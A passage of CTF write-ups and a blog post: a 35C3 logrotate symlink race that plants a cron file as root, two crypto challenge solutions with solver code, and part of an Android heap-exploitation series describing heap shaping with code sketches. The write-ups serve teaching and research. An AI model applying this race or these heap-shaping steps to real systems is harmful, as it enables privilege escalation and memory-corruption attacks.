	notifempty
	size 1K
}


This concludes the environment overview.

Privilege Escalation
Basic idea
For privilege escalation purposes, we should note that two things are out of the ordinary:

  • We can invoke logrotate as root (using the suid /home/user/run_cron)
  • We control the entire path of the log file /tmp/log/pwnme.log 

Inspecting man logrotate, we expect the following to happen when logrotate is invoked:

  • Delete    /tmp/log/pwnme.log.12
  • Rename /tmp/log/pwnme.log.11 to /tmp/log/pwnme.log.12
  • Rename /tmp/log/pwnme.log.10 to /tmp/log/pwnme.log.11
  • . .
  • . .
  • Rename /tmp/log/pwnme.log.1 to /tmp/log/pwnme.log.2
  • Rename /tmp/log/pwnme.log      to /tmp/log/pwnme.log.1
  • Touch    /tmp/log/pwnme.log   with ownership of user:user

The basic idea that comes to mind is to introduce a race between step 7 and step 8, i.e.:

7. Rename /tmp/log/pwnme.log to /tmp/log/pwnme.log.1

→ Replace /tmp/log with a symbolic link to /etc/cron.d

8. Touch /tmp/log/pwnme.log with ownership of user:user

Hence, step 8 will create an empty file owned by user:user inside /etc/cron.d instead of /tmp/log.

The replacement of /tmp/log with a symbolic link can simply be done by the equivalent of:

mv /tmp/log /tmp/dummy && ln -s /etc/cron.d/ /tmp/log

Issues and Solutions

Issue 1

Logrotate runs the stat() function against /tmp/log/pwnme.log at some point.

This test fails due to the “protected_symlinks” security feature (/proc/sys/fs/protected_symlinks set to 1). The feature prevents the root user from following, via stat(), symbolic links placed in sticky world-writable directories, and, of course, /tmp is sticky.

Solution

The same time-of-check / time-of-use issue exists here as well.

Since the security feature only affects stat() and not open(), the symbolic link should simply be created after the stat() has succeeded.

Issue 2

While we were able to win the race on our local machine, it was not easy to win it on the remote machine, where the number of attempts was significantly smaller and the timing was different.

We searched for ways to increase the chances of winning the race.

Solution
We went over the logrotate code and realized that what was actually happening was:

  • Rename /tmp/log/pwnme.log.12 to /tmp/log/pwnme.log.13    ← 13 (!)
  • Rename /tmp/log/pwnme.log.11 to /tmp/log/pwnme.log.12
  • ..
  • ..
  • Rename /tmp/log/pwnme.log.1  to /tmp/log/pwnme.log.2
  • Rename /tmp/log/pwnme.log     to /tmp/log/pwnme.log.1
  • Does /tmp/log/pwnme.log exist? ← Note: it was renamed in the previous step
    • Write to STDOUT “Renaming file .. “
    • Rename /tmp/log/pwnme.log to /tmp/log/pwnme.log.backup.HH.MM.DD
    • If rename failed exit()
  • Touch    /tmp/log/pwnme.log     with ownership of user:user
  • Unlink   /tmp/log/pwnme.log.13

Note: The above pseudo code is a simplified version of the actual code. The actual code is a bit more involved.

The replacement of /tmp/log with the symbolic link that points to /etc/cron.d should happen just before step 7.

The “write to STDOUT” in step 7.1 is the closest printout to the race that we could find.

We created an executable that ran ‘run_cron’ but replaced its STDOUT with a pipe whose buffer was already full, which means that any additional write to the pipe by the process (such as the ‘write to STDOUT’ in step 7.1) would block.

The above executable created /tmp/log/pwnme.log in a tight loop, trying to get in between steps 6 and 7.

Once the root-logrotate process was blocked, our executable did the following:

  • Read from the pipe, to release the root-logrotate process, that was stuck in step 7.1
  • Tight loop of X cycles, so that step 7.2 finishes, but before step 8
  • mv /tmp/log /tmp/dummy && ln -s /etc/cron.d/ /tmp/log

By trying increasing X values for the delay, the race was won. 
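To illustrate the blocking trick, here is a minimal sketch (our own reconstruction, not the actual exploit; the constant and names are ours) of pre-filling a pipe so the child’s next write to STDOUT blocks:

import fcntl, os, subprocess

F_GETPIPE_SZ = 1032                  # Linux-specific fcntl command

r, w = os.pipe()
size = fcntl.fcntl(w, F_GETPIPE_SZ)  # capacity of the pipe buffer
os.set_blocking(w, False)            # don't block ourselves while filling
try:
    os.write(w, b"A" * size)         # fill the pipe buffer completely
except BlockingIOError:
    pass
os.set_blocking(w, True)

# the child's "Renaming file .." write in step 7.1 will now block
proc = subprocess.Popen(["./run_cron"], stdout=w)

# ... create /tmp/log/pwnme.log in a tight loop until the child blocks, then:
os.read(r, 4096)                     # drain: release the blocked write
# ... busy-wait X cycles, then: mv /tmp/log /tmp/dummy && ln -s /etc/cron.d/ /tmp/log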

Finally
ls -l /etc/cron.d/
-rw-r--r--     1 root root    logrotate
-rwxr-xr-x     1 user user    pwnme.log

Note that pwnme.log is executable, since logrotate created the file with the original permissions of /tmp/log/pwnme.log, which, in turn, was under our control.

The end was trivial:
echo "#!/bin/sh" >> /etc/cron.d/pwnme.log
echo "cat /flag" >> /etc/cron.d/pwnme.log
./run_cron
35c3_rotating_as_intended

Afterthoughts
The race was won pretty crudely, and it may also be the case that we were “helped” by other people running in parallel on the same machine, attempting to solve this or other challenges.
We’re pretty sure that there are much better ways to win this race, perhaps using the inotify interface, or even, if permitted, a fuse mount.
The inotify interface can reveal when files are created, indicating the right time to make the symbolic link.
A fuse mount over /tmp or /tmp/log can be used to block logrotate, and give ample time to create the symbolic link.
We would like to see other solutions to this challenge, and learn from them 🙂

 

Post Quantum

I will describe my solution to the “post quantum” crypto challenge from the 35C3 CTF (2018).
We begin the challenge by downloading a tar.gz file containing two python scripts, “challenge.py” and “generate.py”, and a directory called data. As always, we are requested to find the flag.

Let’s start by looking at generate.py:

from challenge import CodeBasedEncryptionScheme

from random import SystemRandom
from os import urandom



if __name__ == "__main__":
    cipher = CodeBasedEncryptionScheme.new()
    random = SystemRandom()
    for i in range(1024 + 512):
        pt = urandom(2)
        ct = cipher.encrypt(pt)
        with open("plaintext_{:03d}".format(i), "wb") as f:
            f.write(pt)
        with open("ciphertext_{:03d}".format(i), "wb") as f:
            f.write(ct)
        assert(pt == cipher.decrypt(ct))

    with open("flag.txt", "rb") as f:
       flag = f.read().strip()

    if len(flag) % 2 != 0:
        flag += b"\0"

    cts = list()
    for i in range(len(flag) // 2):
        cts.append(cipher.encrypt(flag[i*2:i*2 + 2]))

    for i, ct in enumerate(cts):
        with open("flag_{:02d}".format(i), "wb") as f:
            f.write(ct)

As we can see, the script initializes some kind of encryption object called cipher and uses it to encrypt 1024+512 two-byte strings. Every plaintext string and its encryption are stored in separate files. The script then reads a file called “flag.txt” and encrypts every 2 bytes of it into a separate file. All of these files (except flag.txt) are found in the data directory.

At this point, we realize that given enough ciphertext samples and their corresponding plaintext, we should be able to somehow compute the encryption key and decrypt the encrypted flag files.
In order to do that, we need to analyze the file challenge.py that implements the encryption and decryption.

#!/usr/bin/python3

from BitVector import BitVector
from random import SystemRandom

inverse_error_probability = 3

def matrix_vector_multiply(columns, vector):
    cols = len(columns)
    assert(cols == len(vector))
    rows = len(columns[0])
    result = BitVector(size=rows)
    for i, bit in zip(range(cols), vector):
        assert(len(columns[i]) == rows)
        if bit == 1:
            result = result ^ columns[i]
    return result

def bitvector_to_bytes(bitvector):
    return bitvector.int_val().to_bytes(len(bitvector) // 8, 'big')

def bitvector_from_bytes(bytes):
    return BitVector(size=len(bytes) * 8, intVal = int.from_bytes(bytes, 'big'))

class CodeBasedEncryptionScheme(object):

    @classmethod
    def new(cls, bitlength=48):
        key = cls.keygen(bitlength)
        return cls(key)

    def __init__(self, key):
        self.key = key
        self.key_length = len(self.key)
        self.random = SystemRandom()

    @classmethod
    def keygen(cls, bitlength):
        key = SystemRandom().getrandbits(bitlength)
        key = BitVector(size=bitlength, intVal = key)
        return key

    def add_encoding(self, message):
        message = int.from_bytes(message, 'big')
        message = BitVector(size=self.key_length // 3, intVal=message)
        out = BitVector(size=self.key_length)
        for i, b in enumerate(message):
            out[i*3 + 0] = b
            out[i*3 + 1] = b
            out[i*3 + 2] = b
        return out


    def decode(self, message):
        out = BitVector(size=self.key_length // 3)
        for i in range(self.key_length // 3):
            if message[i * 3] == message[i * 3 + 1]:
                decoded_bit = message[i * 3]
            elif message[i * 3] == message[i * 3 + 2]:
                decoded_bit = message[i * 3]
            elif message[i * 3 + 1] == message [i * 3 + 2]:
                decoded_bit = message[i * 3 + 1]
            else:
                assert(False)
            out[i] = decoded_bit
        return bitvector_to_bytes(out)

    def encrypt(self, message):

        message = self.add_encoding(message)

        columns = [
            BitVector(
                size=self.key_length,
                intVal=self.random.getrandbits(self.key_length)
            )
            for _ in range(self.key_length)
        ]

        # compute the noiseless mask
        y = matrix_vector_multiply(columns, self.key)

        # mask the message
        y ^= message

        # add noise: make a third of all equations false
        for i in range(self.key_length // 3):
            noise_index = self.random.randrange(inverse_error_probability)
            y[i * 3 + noise_index] ^= 1

        columns = [bitvector_to_bytes(c) for c in columns]
        columns = b"".join(columns)

        return columns + bitvector_to_bytes(y)

    def decrypt(self, ciphertext):

        y = ciphertext[-self.key_length // 8:]
        columns = ciphertext[:-self.key_length // 8]
        columns = [
            bitvector_from_bytes(columns[i:i+self.key_length // 8])
            for i in range(0, len(columns), self.key_length // 8)
        ]
        y = bitvector_from_bytes(y)

        y ^= matrix_vector_multiply(columns, self.key)
        result = self.decode(y)
        return result

Just by looking at the names of the functions and variables, we can guess that we are facing an encryption scheme that uses some linear algebra (much like in the first challenge “unofficial”).

The encryption algorithm begins by “encoding” the input message by tripling every bit in it. That is, the input 00101 becomes 000000111000111.
It then generates 48 random columns, each containing 48 random bits, and uses them as a 48×48 matrix over GF(2) (https://en.wikipedia.org/wiki/GF(2)). It then multiplies this matrix by the key, which is a 48-bit random vector, and uses the result to mask the encoded input message. Finally, noise is added, flipping one random bit in every 3 sequential (non-overlapping) bits. The output of the encryption is the random 48×48 matrix plus the masked-and-noised message. Let’s describe the encryption algorithm in a more “linear algebra” way:

  • y=Encode(Message) // this triples the bits. Assuming a 2 byte input, the result is a vector of length 48 over GF(2).
  • M=RandomMatrix(FieldSize=2, Dimension=48)
  • r=noise(48) // this generates the noise vector – in every 3 sequential bits, one equals 1 and the others are 0.
  • return(M,M⋅key+y+r)

As for the decryption – given (M,c) it computes y’=c+M⋅key . The plaintext is then reconstructed from y’ by applying “majority” on every 3 sequential bits.

How can we break this encryption?

Let’s first assume no noise was added. Then every pair of plaintext and ciphertext provides us with equations of the form:

c_k + y_k = Σ_j M[k][j]⋅key_j (mod 2), for k = 1,…,48

(this follows from c = M⋅key + y). Here the only unknown values are the key bits, and so we treat them as variables in our system of equations. We have 48 equations per ciphertext+plaintext pair and 48 variables (NOTE: the equations consist of random scalars and thus are most likely linearly independent). Solving this is pretty much straightforward (using SAGE, MATLAB or any other tool supporting simple linear algebra operations).

However, we have the noise added to the equations, so what do we do? We treat them as more variables!
The equations are of the form:

c_k + y_k = Σ_j M[k][j]⋅key_j + r_k (mod 2)

where r_k is a different variable in every equation. Seemingly we encounter another problem now – every equation adds another variable, so for k equations we have k+48 variables.
We do however know some more restrictions on the new variables r_k. We know that for every k≡0 mod(3):

r_k + r_(k+1) + r_(k+2) = 1

since the noise flips exactly one bit in every group of 3. This means that for every k original equations, we get k/3 additional equations and k+48 variables. Hence we only need to make sure that k ≥ 48⋅3 = 144 and we are fine. For this it suffices to use only 3 or 4 pairs of ciphertext and plaintext files. This approach indeed solves the challenge!
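To make this concrete, here is a hedged sketch in Sage (our own illustration, not the solver we actually ran). It assumes pairs holds, for each plaintext/ciphertext file pair, the 48×48 matrix M arranged with one row per equation (i.e. the transpose of the stored columns), the encoded plaintext bits y and the masked bits c:

from sage.all import GF, matrix, vector

def recover_key(pairs):
    F = GF(2)
    n = 48
    nvars = n + len(pairs) * n            # key bits + one noise bit per equation
    rows, rhs = [], []
    for p, (M, y, c) in enumerate(pairs):
        for k in range(n):                # masking equations: M*key + r = c + y
            row = [0] * nvars
            for j in range(n):
                row[j] = M[k][j]
            row[n + p * n + k] = 1        # the noise bit r_k of this equation
            rows.append(row)
            rhs.append((c[k] + y[k]) % 2)
        for k in range(0, n, 3):          # exactly one flip per 3-bit group
            row = [0] * nvars
            row[n + p * n + k] = 1
            row[n + p * n + k + 1] = 1
            row[n + p * n + k + 2] = 1
            rows.append(row)
            rhs.append(1)
    A = matrix(F, rows)
    sol = A.solve_right(vector(F, rhs))
    return sol[:n]                        # the first 48 entries are the key bits

# with 4 pairs: 4*48 + 4*16 = 256 equations vs. 48 + 4*48 = 240 variables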

Crypto Challenge – Unofficial

Original Challenge:

  • Solves: 35
  • The NSA gave us these packets, they said it should be just enough to break this crypto.

Challenge files

Difficulty estimate: medium

In the files we have one pcap file – surveillance.pcap – which contains 40 TCP streams (Wireshark → Statistics → Conversations).

When we follow the TCP stream – each stream looks very similar to this:

20779900528817692337799168797527459491 62670239152271854568281304556299175800 93353632585838558129339305409612190036 29275293709030893096906315031093475117 217443785766847465643965167326471366930 87768394800337534630670868726874169262 94272021819697638819758476484784437174 79761509873597193538805774586772152551 287077043474345536330292000256667722862 338545568968754066451781943973364050747 297369519464034454780797709549121754981 56885490048115174244568542056852168691 125409768592704189418754659727077855243 248903210971800661957902959437529720078 105198372128401404878582092383380684270 171346466625618610030275381510572715586 155477660830517170755561240929991575154 182673696836619568854491288432442673233 262702931683036291589579288667282098519 18870116631740236121991956018407513291 259639713869223969256075040261046227211 211759681449153548839999286208573748417 75564698223593131868793110465400517546 3957872548388281697136273156279603423 216645505172179755607682378174353919850 229968384683068856202657067569523090578 66739301027057081876758954753275857501 116367528061570402100923471061918655467 143750469825367138306146966620543701048 183518250254992484830711613992618112334 177659446112610152502618121534022672394 294880691868997745862235404753518785618 296817543478127190410821587158884107642 58918844088249738906048787671526281242 191823527475136131674233114644080652238 115153266167256987643478624321147128279 33028997731842108545265409344234591070 32020688555063599381439427034519438611 136800502151738819775273044156131929386 297262660200845071604521241820385548094
487839305465823234006845594602546874778491
ACCESS GRANTED
aef8c15e422dfb8443fc94aa9b5234383d8ee523d6da9c4875ccf0d2cf24b1c3fa234e90b9f9757862d242063dbd694806bc54582deddbcbcc

except one stream which is:

58557110956988947057604802588561896500 124389245447086365003181102994712842606 82395139655125145682424929123746759522 47649451703051529899277902695473539892 150981473550872530548663509246216281805 168563983740131744014317862124200995089 138586260804512475239450269675967207835 62436069859970279880393432647328777542 22913686979727780041806138144484753933 14377633287456896562041901004526098962 273196090090464520445990336716474469243 242168062305495710098626001414876184684 94362973583077677476509316957112725408 29088551100976965023442015189790524406 43231997455607345760204676007554876342 132361861464878302707174999703933345282 253872750092097302859318147550396944380 213628045569424246848985217725072451309 294344411139289978298406248909275102813 226888910812725047738767244100865543325 94082207521578531435238803168695213013 97111136227337754555078662768570661087 185250299454417634170420352961477926506 67438648618265917969789929448437485879 101682932749781295458233490525355462280 113556545381411565044202682512491580939 244226227037022039791321269794441569705 61030029875782065229041917864523517796 189182692689289560885216139521470329934 30211253278711272924044288553988214247 121622236650064002460174949909446201741 65301450599692169122475160199358409465 73053494341241445616892110693763168071 234683993955061111113773411581440059586 283639424985419487458121053850137768397 127760719714334178221109348661056530813 128791727498437259840522852285552430716 20843448351817739519520104708561322010 176162735964861803752894890674194111533 42645121406909462815210125923299652368
20122444954621613642609378528068231780800
ACCESS DENIED

We also have the python code for the server side:

import os, math, sys, binascii
from secrets import key, flag
from hashlib import sha256
from Crypto.Cipher import AES

p = 21652247421304131782679331804390761485569
bits = 128
N = 40

def rand():
    return int.from_bytes(os.urandom(bits // 8), 'little')

def keygen():
    return [rand() for _ in range(N)]

if __name__ == '__main__':
    #key = keygen()   # generated once & stored in secrets.py
    challenge = keygen()
    print(' '.join(map(str, challenge)))
    response = int(input())
    if response != sum(x*y%p for x, y in zip(challenge, key)):
        print('ACCESS DENIED')
        exit(1)

    print('ACCESS GRANTED')
    cipher = AES.new(
            sha256(' '.join(map(str, key)).encode('utf-8')).digest(),
            AES.MODE_CFB,
            b'\0'*16)
    print(binascii.hexlify(cipher.encrypt(flag)).decode('utf-8'))

 

Encryption Scheme:

The server sends a random challenge – a list of N random numbers, each 128 bits long (16 bytes).

It expects a response back, which should be the result of the following calculation: Sum(Challenge[i]*Key[i] % p).

If the response is correct – we get the flag encrypted with the key.

First thoughts:

  • p is not really prime:
    python -m primefac 21652247421304131782679331804390761485569
    21652247421304131782679331804390761485569: 311 311 313 313 317 317 331 331 337 337 347 347 349 349 353 353
    * 8 different prime factors
    * each prime factor appears twice
  • Since we have the session data, we can use it to solve 40 equations with 40 variables – or at least we could if we had 40 successful sessions, but we have only 39.
  • But we are working in the “field” of modulus p, so we might not need all 40 equations…
    In the end, all you needed to do was solve the 39 equations.
  • We are not completely sure why, but it appears that the 39 equations (congruences, to be exact) are enough to span the whole solution space.

using sage the solution looks like this (python2):

from Crypto.Cipher import AES
from matrix import *
from hashlib import sha256
import binascii

p = 21652247421304131782679331804390761485569 # 311 311 313 313 317 317 331 331 337 337 347 347 349 349 353 353
N = 40

R = IntegerModRing(p)
M = Matrix(R, [vector(R, ch) for ch in Challenges])
b = vector(R, Responses)
key = (M.solve_right(b))

flag = 'aef8c15e422dfb8443fc94aa9b5234383d8ee523d6da9c4875ccf0d2cf24b1c3fa234e90b9f9757862d242063dbd694806bc54582deddbcbcc'.decode('hex')

cipher = AES.new(
            sha256(' '.join(map(str, key)).encode('utf-8')).digest(),
            AES.MODE_CFB,
            b'\0'*16)
print 'solution'
print cipher.decrypt(flag)

 

where matrix.py was generated by the following script (python3):

import pyshark
cap = pyshark.FileCapture('surveillance.pcap')

N = 40
session_data = {}
for i in range(N):
    session_data[i] = b''

Challenges = []
Responses = []

for pkt in cap:
    try:
        session_data[int(pkt.tcp.stream)] += pkt.data.data.binary_value
    except AttributeError:
        pass

for i in range(N):
    data = session_data[i].split(b'\n')
    if data[2] == b'ACCESS GRANTED':
        Challenges.append([int(x) for x in data[0].split(b' ')])
        Responses.append(int(data[1]))

print ('Challenges = []')
print ('Responses = []')

for i in range(N-1):
    print ('Challenges.append(%s)' % (Challenges[i]))
    print ('Responses.append(%s) ' % (Responses[i]))

A Tale of Two Mallocs: On Android libc Allocators – Part 3 – exploitation

In the two previous posts of this series, we’ve discussed how the Android libc allocators work. In this last post of the series, we can try to determine what we need to do in order to exploit a heap memory corruption or use-after-free, in light of these allocators.

Exploiting these kinds of bugs is all about precise positioning of heap objects. We want to force certain objects to be allocated in specific locations in the heap, in order to form useful adjacencies for memory corruption, or reuse of a desired location for a use-after-free.

The operations performed in order to force the allocator to allocate the objects we want in the positions we want is known as heap shaping or heap ‘feng shui’. We essentially need to take advantage of our understanding of the inner workings of the allocator in order to allocate desired objects in the locations or with the adjacencies we desire.

One of the things which can really make a huge difference when implementing heap shaping for an exploit is having a way to visualize the heap: to see the various allocations in the context of the heap.

For this we need tools. These tools need not be especially complex. We don’t really need a fancy GUI to visualize regions or chunks. A simple tool which will allow us to inspect the heap state for a target process during exploit development will make an incredible difference.

As it happens, argp and vats presented a tool for visualizing the jemalloc heap at last year’s Infiltrate. They later released the tool, which they call shadow, on github, with support for both Firefox’s standalone jemalloc and Android’s libc jemalloc. I highly recommend viewing their talk and using their tool. Shadow is a debugger plugin which allows you to view the various jemalloc structures in a textual table format. It really makes a big difference in understanding how the heap is behaving during exploit development.

Despite the fact that dlmalloc is more than 30 years old, we were unable to find a similar visualization tool for it at the time we were working on it. So we wrote one.

We’ve released shade, a dlmalloc visualization tool, on github at https://github.com/s1341/shade. The tool has an interface very similar to that of shadow.

You can request info about a given chunk using its address. This tells you the size of the chunk, its status and the segment to which it belongs.

You can get a quick picture of the chunks before and after your chunk using the dlaround command. This shows a table of chunks centered around your chunk, including their addresses, sizes and statuses.

Once you know a segment base address, you can use the dlsegment command to view all the chunks in that segment.

shade currently works only in gdb with Android’s libc dlmalloc in 32bit ARM processes. This is mostly because that has been what we’ve needed it for. Pull requests are, of course, more than welcome!

While preparing for this presentation, I found that the excellent NCC Group released their own tool for visualizing dlmalloc heaps about 6 months ago. While I have not used it actively, it seems like a great tool.

Let’s get back to exploitation. For the purposes of this discussion, let’s assume that you have discovered a 0-day heap buffer overflow in application X. It’s time to exploit it.

Modern exploitation is hard. The Android system is one of the most heavily hardened platforms out there. Android devices implement a whole host of mitigations to make exploiting vulnerabilities and gaining control of devices more difficult. Things like Address Space Layout Randomization, SELinux and process sandboxing are designed to make end-to-end exploitation as painful as possible.

We can, however, overcome some of these mitigations by the generous application of persistence, creativity and luck. We usually end up breaking the exploitation down into a few steps, each of which uses a gadget of some sort.

Gadgets are specific exploitations of your vulnerability set to achieve one or more functionalities which can be chained together to create an end-to-end exploit. We usually need one or more gadgets to actually gain something useful. The gadgets might come from different ways of exploiting a single vulnerability, or from different vulnerabilities.

We usually need a relative read or write gadget to overcome ASLR, followed by arbitrary read/write or execute gadgets to gain code execution. Once we have code execution, we can try to escape sandboxing or to evade SELinux.

How do we go about creating a gadget from a heap buffer overflow?

We do this with adjacency. What we want to do is to position the object containing the overflowable buffer just before another object, which we’ll call the gadget object. We need to be able to trigger operations on that gadget object, which will, for example, use a pointer inside the object’s data structure to perform a read operation.

We can then cause the overflow, overwriting the pointer in the gadget object’s data structure with a pointer of our choice. We then trigger the read operation to read data at our desired pointer.

Using adjacency, we have created an arbitrary read gadget. We can use similar techniques to create write and execute gadgets. The key is to have a useful operation, which we can repurpose as a gadget by modifying object data through our overflow.

In order to achieve this adjacency, we need to shape the heap such that our exploitable object is allocated just before our gadget object.

Note that on dlmalloc the two objects can be of completely different sizes, as dlmalloc allows allocations of various sizes to be contiguous. For jemalloc, however, the overflow and gadget objects must be of the same size class, so that they will be allocated from the same bin, in the same run. This can greatly increase the complexity of exploitation on jemalloc, as it is necessary to find gadget objects which not only provide useful functions, but which fit in the right bin.

If you find an object which will work for jemalloc, it may work for dlmalloc too, but the reverse is not true.

So how do we go about performing the shaping necessary to get our objects allocated as desired? Remember that our interface to the allocator is very simple. We essentially only have the allocate and free operations. We need to use those to perform our shaping. What we need are some useful allocation primitives.

We need some way to cause the target application to perform allocations and frees. Usually we’ll look for some discrete, easily triggerable, functionality, such as processing of a particular kind of network packet, or usage of a particular kind of object, which performs allocations or frees as a side-effect of its normal operation.

It’s important that the primitive perform the allocation or free operation we want, at the time that we want it, so we can use it to gain control of the heap. A given exploitation might require more than one primitive.

The ideal primitive will allow us to allocate an arbitrary size, fill it with attacker controlled data and free it at a later stage with another application trigger.
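
In code terms, the ideal primitive behaves like the following hypothetical interface. These are not real functions in any target; in practice each one is a trigger, such as a packet you send or a script operation you perform:

#include <cstddef>
#include <cstdint>

// Hypothetical allocation primitive interface. In a real target these are
// application behaviors we trigger, not functions we call directly.
void *prim_alloc(size_t size, const uint8_t *data, size_t data_len); // allocate 'size' bytes filled with our data
void  prim_free(void *handle);                                       // free that same allocation, on demand, later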

Although the ideal primitive is the holy grail, we will often have to make do with lesser primitives. For example, a primitive which only allocates at a specific size, or one which allocates memory we cannot reliably free later. Some of these lesser primitives are more useful on jemalloc, some on dlmalloc.

The primitives you’ll find in your target app really depend on its specific details. They might be the result of sending certain types of packets to the target, performing operations in a scripting context such as JavaScript, or creating and freeing objects through higher-level, more abstract, operations.

Finding good primitives is a bit of an art form. It is often necessary to reverse a lot of code before useful primitives can be found. So what should one look for?

You can start by looking for raw mallocs. These are probably the simplest primitives. A function which performs a raw malloc, either with a size you can control or of a fixed size, can be a useful primitive. Sometimes the allocation will be for a multiple of a structure size.

Another good source of primitives is C++ classes which are allocated with the new operator. In most cases this new translates directly to a malloc for the size of the class. If you can easily trigger allocation and freeing of classes of interesting sizes, you have yourself an allocation primitive. These classes can also serve as excellent gadget objects.

Reallocs can also be a good source of primitives. They are often used with zero-length arrays in C structs in order to create variable-length ‘contained’ arrays of sub-objects. From a heap-shaping perspective, a growing realloc is essentially the same as a malloc of the new size, followed by a copy and a free of the old chunk.

If your target process uses the C++ standard template library, a good place to look for allocation primitives is in std::vectors. The growth of those vectors causes a ‘new’ behind the scenes which is essentially just a malloc. As the vector grows, it might fit into the size bin you are interested in. It may be necessary to add objects iteratively until the vector grows to the correct size.
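
As a sketch, here is how vector growth can be walked into a target size class. The target size is hypothetical, and the exact sequence of capacities is implementation-defined, so it varies between STL versions:

#include <vector>
#include <cstdint>
#include <cstdio>

int main() {
    std::vector<uint64_t> v;
    // Each time size() exceeds capacity(), the vector reallocates its backing
    // store -- effectively a malloc of the new capacity in bytes. Pushing
    // elements one at a time walks the backing store through successive size
    // classes until it lands in the bin we care about.
    size_t target_bytes = 0x500;  // hypothetical target bin size
    while (v.capacity() * sizeof(uint64_t) < target_bytes)
        v.push_back(0);
    printf("backing store is now %zu bytes\n", v.capacity() * sizeof(uint64_t));
}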

std::string also uses malloc to allocate backing stores for the strings it contains. If you can allocate a std::string from a raw buffer, the size of which you control, you have an excellent primitive. Note however that std::strings are often passed by value, which causes their data to be copied into new allocations. This could be a source of ‘allocation noise’ which you might want to avoid.

In general, it’s necessary to think creatively about the accessible operations in your target in order to find the allocation primitives you need.

Let’s walk through an example exploitation with notes on some issues you might encounter on each of the allocators.

First, let’s define our assumptions:

  • Let’s say we have discovered a buffer overflow in an object of size 0x4e0. We are able to overflow an arbitrary number of bytes with controlled data, starting from the overflowable buffer.
  • Let’s also say that we have discovered a useful gadget object, with size 0x450. This means this object will be in the same size class as the overflowable object.
  • Let’s also assume that we have discovered an allocation primitive which allows us to allocate at an arbitrary size.
  • We’ve also got the ability to free any of the allocations we make with the allocation primitive.
  • Finally, by performing an operation on the gadget object, we are able to determine if it has been overflowed or not.

We need to cause the overflowable object to be allocated immediately before the gadget object, using the allocation and free primitives to shape the heap.

The assumptions we’ve made are good assumptions. Without a gadget object in the same size class as the overflowable object, it is almost impossible to exploit a buffer overflow on jemalloc. Without an arbitrary size allocation primitive, it is very difficult to exploit on dlmalloc.

One technique for heap shaping that I’ve found particularly successful is called the placeholder technique.

The idea is simple. Using our arbitrary allocation primitive, we allocate a bunch of placeholder sets for our target objects, at the sizes of those objects. Each set of placeholders has a placeholder for the overflowable object and a placeholder for the gadget object. We hope that at least one set of placeholders is allocated such that the overflowable placeholder is directly before the gadget placeholder.

Next, we iterate over all of our placeholder sets, and for each set, we free the gadget placeholder and cause a gadget object to be allocated. Hopefully this gadget object will fall into the freed placeholder slot.

Then we once more iterate over each of our placeholder sets, this time freeing the overflowable placeholder, allocating our overflowable object and performing the overflow. We then activate the gadget for each instance of the gadget object, and use the result to determine if we have overflowed this instance or not. Hopefully at least one set of placeholders will have been turned into a working gadget.
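
Putting the three passes together, the placeholder technique looks roughly like the following sketch. It reuses the hypothetical prim_alloc/prim_free primitives from earlier, and the trigger_* and check_* helpers are likewise stand-ins for application behavior:

#include <cstddef>

// All of these are hypothetical stand-ins for application triggers: sending a
// packet, running a script, etc. None of them are real APIs.
extern void *prim_alloc(size_t size, const void *data, size_t len);
extern void  prim_free(void *handle);
extern void  trigger_gadget_allocation();
extern void  trigger_overflow_allocation_and_overflow(int set);
extern bool  check_gadget_overflowed(int set);

constexpr int    NUM_SETS      = 32;     // how many placeholder sets to try
constexpr size_t SIZE_OVERFLOW = 0x4e0;  // overflowable object size (our example)
constexpr size_t SIZE_GADGET   = 0x450;  // gadget object size (our example)

void placeholder_shaping() {
    static const char filler[SIZE_OVERFLOW] = {0};
    void *ph_overflow[NUM_SETS], *ph_gadget[NUM_SETS];

    // Step 1: interleaved placeholder pairs. With luck, in at least one pair
    // the overflow placeholder sits directly before the gadget placeholder.
    for (int i = 0; i < NUM_SETS; i++) {
        ph_overflow[i] = prim_alloc(SIZE_OVERFLOW, filler, SIZE_OVERFLOW);
        ph_gadget[i]   = prim_alloc(SIZE_GADGET,  filler, SIZE_GADGET);
    }

    // Step 2: swap each gadget placeholder for a real gadget object,
    // which hopefully reuses the freshly freed slot.
    for (int i = 0; i < NUM_SETS; i++) {
        prim_free(ph_gadget[i]);
        trigger_gadget_allocation();
    }

    // Step 3: swap each overflow placeholder for the overflowable object,
    // overflow it, then test every gadget instance for corruption.
    for (int i = 0; i < NUM_SETS; i++) {
        prim_free(ph_overflow[i]);
        trigger_overflow_allocation_and_overflow(i);
        if (check_gadget_overflowed(i))
            return;  // found a working pair
    }
}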

This idea is the basis for the placeholder heap shaping technique. This technique can be used on both jemalloc and dlmalloc, but there are various things to look out for on each of the respective allocators.

One thing that can help increase the probability that one or more placeholder sets will have contiguous overflowable and gadget objects is to spray a large number of allocations of the relevant size class at the very beginning of the exploit. This will hopefully cause any best-fit chunks in the dlmalloc free lists or partially used runs in the relevant jemalloc bin to be used up, filling the holes. The placeholder allocations will then most probably be from new dlmalloc segments or new jemalloc runs, with successive allocations for the same size class falling after one another.

One problem you may encounter is that allocating the overflowable object or the gadget object, or even using the allocation primitives, performs more than just the target allocation. In fact, it is very common for one or more of these to perform a bunch of smaller or bigger allocations around the actual target allocation we’re interested in.

These unwanted allocations shouldn’t make any difference when using jemalloc, as there we are concerned only with allocations in our bin.

On dlmalloc, these allocations might fall between the overflowable object and the gadget object, messing with our heap shaping.

Assuming the gadget object is the one which performs the unwanted allocations, one way to deal with this issue is the following sequence (sketched in code after the list):

  • First, at the beginning of the exploit, we allocate a bunch of smaller blocks, say 100 blocks of 0x100 bytes each.
  • We then allocate all the placeholder sets.
  • Then, for each placeholder set, we first free the gadget placeholder.
  • Then we free a few of the small filter allocations. These will be added to the free bins.
  • Then we allocate the gadget itself. The smaller unwanted allocations will use the filter allocations we just freed, and the gadget itself will fall on the placeholder.
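
A sketch of that sequence, again using the hypothetical primitives from before:

#include <cstddef>

// Hypothetical primitives, as before.
extern void *prim_alloc(size_t size, const void *data, size_t len);
extern void  prim_free(void *handle);
extern void  trigger_gadget_allocation();

void place_gadget_with_filters(void *gadget_placeholder, void *filters[], int *next_filter) {
    // Steps 1-2 (done earlier): ~100 filter blocks of 0x100 bytes each were
    // allocated up front, followed by the placeholder sets.
    prim_free(gadget_placeholder);             // open the hole for the gadget object
    for (int i = 0; i < 4; i++)                // free a few filters; they land in
        prim_free(filters[(*next_filter)++]);  // the small free bins
    trigger_gadget_allocation();               // the unwanted small allocations consume
                                               // the freed filters; the gadget itself
                                               // falls into the placeholder hole
}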

